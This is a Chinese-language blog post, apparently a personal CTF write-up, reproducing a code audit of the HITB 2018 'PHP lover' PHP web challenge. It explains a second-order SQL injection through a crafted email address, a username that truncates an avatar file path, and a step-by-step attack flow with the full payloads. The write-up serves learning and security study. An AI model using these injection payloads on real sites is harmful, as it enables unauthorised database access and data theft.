<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.6.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.6.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.6.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.6.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.6.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.6.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="参考文献：https://www.anquanke.com/post/id/104952一直想学代码审计来着，看到了一篇大佬的关于php代码审计的wp，决定自己试一下源码下载地址：https://hitbxctf2018.xctf.org.cn/contest_challenge/里面的web题目中的PHP lover 代码结构12345678Controller           控制器，只有">
<meta name="keywords" content="ctf记录">
<meta property="og:type" content="article">
<meta property="og:title" content="复现HITB PHP lover代码审计">
<meta property="og:url" content="https://cws6.github.io/2018/05/01/复现HITB-PHP-lover代码审计/index.html">
<meta property="og:site_name" content="cws6">
<meta property="og:description" content="参考文献：https://www.anquanke.com/post/id/104952一直想学代码审计来着，看到了一篇大佬的关于php代码审计的wp，决定自己试一下源码下载地址：https://hitbxctf2018.xctf.org.cn/contest_challenge/里面的web题目中的PHP lover 代码结构12345678Controller           控制器，只有">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-169a6b0745c7e670.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-264bfe22262d916f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-d213c94f3ebf5aee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-1f3587f383f39e82.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-ed7ecd7568b7688e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-9b6723aa1811f532.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-20a5d3e9a58a91d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-a33ec7346bee2be6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-b91bf63a7f119ef9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-b6e54c5f1219dbe0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-b639348a8a56f2a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-a68736602bd4847d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-b42185c9ebe0faa0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-558ca3db914a400a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-a453ad6aef14c258.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-71a2493ac6ad1dc5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-b660b99ffcd9cf43.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-3dd7a6fdb4461bd5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/5035860-576ca03ae8d1a1e1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2018-12-03T10:41:13.737Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="复现HITB PHP lover代码审计">
<meta name="twitter:description" content="参考文献：https://www.anquanke.com/post/id/104952一直想学代码审计来着，看到了一篇大佬的关于php代码审计的wp，决定自己试一下源码下载地址：https://hitbxctf2018.xctf.org.cn/contest_challenge/里面的web题目中的PHP lover 代码结构12345678Controller           控制器，只有">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/5035860-169a6b0745c7e670.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">






  <link rel="canonical" href="https://cws6.github.io/2018/05/01/复现HITB-PHP-lover代码审计/">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>复现HITB PHP lover代码审计 | cws6</title>
  











  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a href="https://github.com/cws6"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_darkblue_121621.png" alt="Fork me on GitHub"></a>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">cws6</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">空巢老人</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>

      
      
    </ul>
  

  
    

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://cws6.github.io/2018/05/01/复现HITB-PHP-lover代码审计/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="cws6">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="cws6">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">复现HITB PHP lover代码审计
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2018-05-01 01:00:25" itemprop="dateCreated datePublished" datetime="2018-05-01T01:00:25+08:00">2018-05-01</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2018-12-03 18:41:13" itemprop="dateModified" datetime="2018-12-03T18:41:13+08:00">2018-12-03</time>
              
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>参考文献：<a href="https://www.anquanke.com/post/id/104952" target="_blank" rel="noopener">https://www.anquanke.com/post/id/104952</a><br>一直想学代码审计来着，看到了一篇大佬的关于php代码审计的wp，决定自己试一下<br>源码下载地址：<a href="https://hitbxctf2018.xctf.org.cn/contest_challenge/里面的web题目中的PHP" target="_blank" rel="noopener">https://hitbxctf2018.xctf.org.cn/contest_challenge/里面的web题目中的PHP</a> lover</p>
<p><strong>代码结构</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Controller           控制器，只有index.controller.php</span><br><span class="line">Core                 类及方法定义</span><br><span class="line">templates            前端的各种html界面</span><br><span class="line">uploads              里面是两张图片</span><br><span class="line">back.sql             创建的数据表</span><br><span class="line">config.php           连接数据库</span><br><span class="line">function.php         定义过滤函数</span><br><span class="line">index.php            入口文件</span><br></pre></td></tr></table></figure></p>
<p><strong>从index.controller.php看下主要功能</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">public function login()</span><br><span class="line">public function register()</span><br><span class="line">public function add()</span><br><span class="line">public function view()</span><br><span class="line">public function edit()</span><br><span class="line">public function export()</span><br></pre></td></tr></table></figure></p>
<ul>
<li>login()<br><img src="https://upload-images.jianshu.io/upload_images/5035860-169a6b0745c7e670.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>登录调用User类的login()方法，跟进login()函数(在<code>user.class.php</code>中)<br><img src="https://upload-images.jianshu.io/upload_images/5035860-264bfe22262d916f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>跟进username的过滤函数filter()(在<code>function.php</code>文件中)<br><img src="https://upload-images.jianshu.io/upload_images/5035860-d213c94f3ebf5aee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>其中正则表达式中的<code>b</code>表示的为单词边界，而不是通配，如<code>preg_match(&quot;/bwebb/i&quot;)</code>只能匹配到<code>web</code>，而<code>web123</code>这种就不能。<br>所以可以用<code>&quot;select * from/**/users&quot;</code>绕过此过滤(/<strong>/作为空格注入)<br>但是在User类的login()方法中，<br><img src="https://upload-images.jianshu.io/upload_images/5035860-1f3587f383f39e82.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>这就把`/</strong>/`过滤了，所以这个方法不行</li>
<li>register()<br><img src="https://upload-images.jianshu.io/upload_images/5035860-ed7ecd7568b7688e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>跟进user类的register()方法<br><img src="https://upload-images.jianshu.io/upload_images/5035860-9b6723aa1811f532.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>其中$username和$nickname没有可能了<br>再看一下email，看下正则匹配<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(!preg_match(&apos;/^(([^&lt;&gt;()[\]\\.,;:\s@\&quot;]+(\.[^&lt;&gt;()[\]\\.,;:\s@\&quot;]+)*)|([\&quot;].+[\&quot;]))@((\[[0-9]&#123;1,3&#125;\.[0-9]&#123;1,3&#125;\.[0-9]&#123;1,3&#125;\.[0-9]&#123;1,3&#125;\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]&#123;2,&#125;))$/i&apos;,$email)) return false;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>其中<code>([\&quot;].+[\&quot;])</code>只需要<code>&quot;&quot;</code>包围即可，引号中可以随便写。所以可以用·<code>&#39;&quot;&#39; and 1=1#&#39;&quot;@skysec.top&#39;</code>这种绕过，但是在<code>daddslashes()</code>这个函数中将<code>&quot;</code>转义了。<br><img src="https://upload-images.jianshu.io/upload_images/5035860-20a5d3e9a58a91d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""></p>
<ul>
<li>add()<br><img src="https://upload-images.jianshu.io/upload_images/5035860-a33ec7346bee2be6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>跟进user类中的add()方法<br><img src="https://upload-images.jianshu.io/upload_images/5035860-b91bf63a7f119ef9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>全部被转义</li>
<li>view()<br><img src="https://upload-images.jianshu.io/upload_images/5035860-b6e54c5f1219dbe0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>跟进user类中的getarticle()函数<br><img src="https://upload-images.jianshu.io/upload_images/5035860-b639348a8a56f2a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>emmm，直接<code>intval()</code>也是妙。。</li>
<li>edit()<br><img src="https://upload-images.jianshu.io/upload_images/5035860-a68736602bd4847d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>上传功能，类型检测可以抓包bypass，但是<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$info=getimagesize($_FILES[&apos;avatar&apos;][&apos;tmp_name&apos;]);</span><br><span class="line">if(@is_array($info) and array_key_exists(&apos;mime&apos;,$info))&#123;</span><br><span class="line">    $type=explode(&apos;/&apos;,$info[&apos;mime&apos;])[1];</span><br><span class="line">    $filename=&quot;uploads/&quot;.$this-&gt;user-&gt;getuser().&quot;.&quot;.$type;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>文件后缀直接是mine的类型，这样就不能bypass上传恶意文件了<br>跟进下user类的getuser()方法<br><img src="https://upload-images.jianshu.io/upload_images/5035860-b42185c9ebe0faa0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>文件名、是我们注册的用户名，用户名是无法bypass的，所以这里的上传，除了文件名长度其他都不可控</p>
<ul>
<li>export()<br><img src="https://upload-images.jianshu.io/upload_images/5035860-558ca3db914a400a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>跟进user()类中的report()方法<br><img src="https://upload-images.jianshu.io/upload_images/5035860-a453ad6aef14c258.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>这里被当做错误触发，未做任何过滤，其中email的插入很关键<br>所以接下来才算步入正题。。。emmm先膜拜下大佬的思路。<br><strong>攻击点</strong></li>
<li>这题注册的时候，可以Bypass注册恶意邮箱，但是其中有符号被转义了</li>
<li>但是这个转义在取出数据库的时候会被去除</li>
<li>如果在取出后，系统又对这个数据进行了一次sql操作，就可以触发注入，通过二次注入</li>
<li>我们的注册的时候注册恶意邮箱，在这里触发错误报告的时候就会被系统再次调用，取出数据库后转义消失</li>
<li>拼接到insert语句时，构成sql注入攻击<br>我们根据这一点注册用户,邮箱为<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&apos;, 233), (2333, (SELECT group_concat(TABLE_NAME) FROM/**/ information_schema.TABLES where TABLE_SCHEMA=database()), 23333)#&quot;@skysec.top</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>假设我们能触发export()函数中的<code>$this-&gt;user-&gt;report(1)</code><br><img src="https://upload-images.jianshu.io/upload_images/5035860-71a2493ac6ad1dc5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""></p>
<p><code>$this-&gt;email</code>为我们邮箱取出数据库的值：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&apos;, 233), (2333, (SELECT group_concat(TABLE_NAME) FROM/**/ information_schema.TABLES where TABLE_SCHEMA=database()), 23333)#&quot;@skysec.top</span><br></pre></td></tr></table></figure></p>
<p>此时利用report插入了两条数据<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$this-&gt;id,&apos;&quot;&apos;, 233</span><br><span class="line">2333, (SELECT group_concat(TABLE_NAME) FROM/**/ information_schema.TABLES where TABLE_SCHEMA=database()), 23333)</span><br></pre></td></tr></table></figure></p>
<p><strong>触发sql注入需要解决</strong><br>①自己的id需要知道，这样可以插入<br>在view()方法中<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">if(isset($_GET[&apos;article&apos;]))&#123;</span><br><span class="line">           $id=intval($_GET[&apos;article&apos;]);</span><br><span class="line">           $result=$this-&gt;user-&gt;getarticle($id);</span><br><span class="line">           if($result==-1)&#123;</span><br><span class="line">               quit(&apos;You have no access to read this article!&apos;);</span><br><span class="line">           &#125;</span><br><span class="line">           else if($result==null)&#123;</span><br><span class="line">               //TODO！report it！</span><br><span class="line">               quit(&apos;This article is not exists!&apos;);</span><br><span class="line">           &#125;</span><br><span class="line">           else&#123;</span><br><span class="line">               if($result[0][2]!=&quot;&quot;) echo &quot;&lt;h1&gt;&quot;.htmlspecialchars($result[0][2], ENT_QUOTES).&quot;&lt;/h1&gt;&quot;;</span><br><span class="line">               echo htmlspecialchars($result[0][3], ENT_QUOTES);</span><br><span class="line">           &#125;</span><br><span class="line">       &#125;</span><br><span class="line">       else&#123;</span><br><span class="line">           $id=$this-&gt;user-&gt;getid();</span><br><span class="line">           $this-&gt;view=$this-&gt;user-&gt;getarticle();</span><br><span class="line">           include(&quot;templates/view.html&quot;);</span><br><span class="line">       &#125;</span><br></pre></td></tr></table></figure></p>
<p>若是不输入article参数，会调用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function getid()&#123;</span><br><span class="line">    	if ($this-&gt;islogin) return $this-&gt;id;</span><br><span class="line">    	else return null;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></p>
<p>就可获得id</p>
<p>②触发<code>if(file_exists($avatar) and filesize($avatar)&lt;65535)</code>false，这样就会成功到else，构成攻击<br>跟进user类中的getavatar()方法<br><img src="https://upload-images.jianshu.io/upload_images/5035860-b660b99ffcd9cf43.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br><img src="https://upload-images.jianshu.io/upload_images/5035860-3dd7a6fdb4461bd5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""><br>查看<code>back.sql</code>文件，其中<br> <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$r[1]:data</span><br><span class="line">$r[3]:filepath</span><br></pre></td></tr></table></figure></p>
<p>如果我们的上传图片有数据，就返回Base64后的数据，否则返回路径</p>
<p><code>edit()</code>的上传功能中有<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$filename=&quot;uploads/&quot;.$this-&gt;user-&gt;getuser().&quot;.&quot;.$type;</span><br><span class="line">if(is_uploaded_file($_FILES[&apos;avatar&apos;][&apos;tmp_name&apos;]))&#123;</span><br><span class="line">    $this-&gt;user-&gt;edit(&quot;avatar&quot;,array($filename,$type));</span><br></pre></td></tr></table></figure></p>
<p>跟进user类中的edit()方法<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if($feild==&quot;avatar&quot;)&#123;</span><br><span class="line">    return $this-&gt;db-&gt;Insert(&quot;avatar&quot;,array(&quot;&apos;&apos;&quot;,$this-&gt;id,&quot;&apos;$value[0]&apos;&quot;,&quot;&apos;$value[1]&apos;&quot;));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>即avatar表的filepath字段为<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uploads/用户名.文件mine</span><br></pre></td></tr></table></figure></p>
<p>数据库结构中</p>
<p><img src="https://upload-images.jianshu.io/upload_images/5035860-576ca03ae8d1a1e1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""></p>
<p>用户名的长度是300，而路径长度<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">`filepath` varchar(300),</span><br></pre></td></tr></table></figure></p>
<p>如果我们的用户名长度为300，此时插入的路径就会被300截断，而变成一个不存在的路径，此时即可触发<code>file_exists($avatar)</code>错误</p>
<p><strong>题目链接打不开了，放下大佬的完整攻击流程：</strong></p>
<ul>
<li>先随便注册个用户，看一下自己的id</li>
<li><p>然后再迅速注册用户，验证id是否是自己预想的id+1</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">username =</span><br><span class="line">skyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskyskysky</span><br><span class="line">email = </span><br><span class="line">&quot;&apos;, 233), (id+1, (SELECT group_concat(TABLE_NAME) FROM/**/ information_schema.TABLES where TABLE_SCHEMA=database()), 23333)#&quot;@skysec.top</span><br></pre></td></tr></table></figure>
</li>
<li><p>登录后触发上传功能</p>
</li>
<li>上传空文件，抓包改mine</li>
<li>触发export功能，即可完成攻击，发现注入成功后的数据<br>最后得到flag表，以及数据</li>
</ul>

      
    </div>

    

    
    
    
    <div>
    
       <div>

    <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>

</div>
    
    </div>

    

    
       
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf记录/" rel="tag"># ctf记录</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/04/27/ThinkPHP搭建博客/" rel="next" title="ThinkPHP搭建博客">
                <i class="fa fa-chevron-left"></i> ThinkPHP搭建博客
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/05/10/代码审计入门总结/" rel="prev" title="代码审计入门总结">
                代码审计入门总结 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">cws6</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">97</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">8</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://r1ka.me" title="http://r1ka.me" rel="noopener" target="_blank">r1ka</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blank233.github.io/" title="https://blank233.github.io/" rel="noopener" target="_blank">Blank</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.lrestless.com/" title="http://blog.lrestless.com/" rel="noopener" target="_blank">lrestless</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wcute.github.io" title="https://wcute.github.io" rel="noopener" target="_blank">鸡翅儿</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/xiaoqiyue/" title="https://www.cnblogs.com/xiaoqiyue/" rel="noopener" target="_blank">爪爪</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/bmjoker" title="https://www.cnblogs.com/bmjoker" rel="noopener" target="_blank">bmjoker</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">cws6</span>

  

  
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

<!-- 
  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>

-->


  <span class="post-meta-divider">|</span>


<!-- 
  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v6.6.0</div>

-->



        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
      
  
  <script type="text/javascript" color="0,0,255" opacity="0.5" zindex="-1" count="99" src="/lib/canvas-nest/canvas-nest.min.js"></script>













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.6.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.6.0"></script>



  
  

  
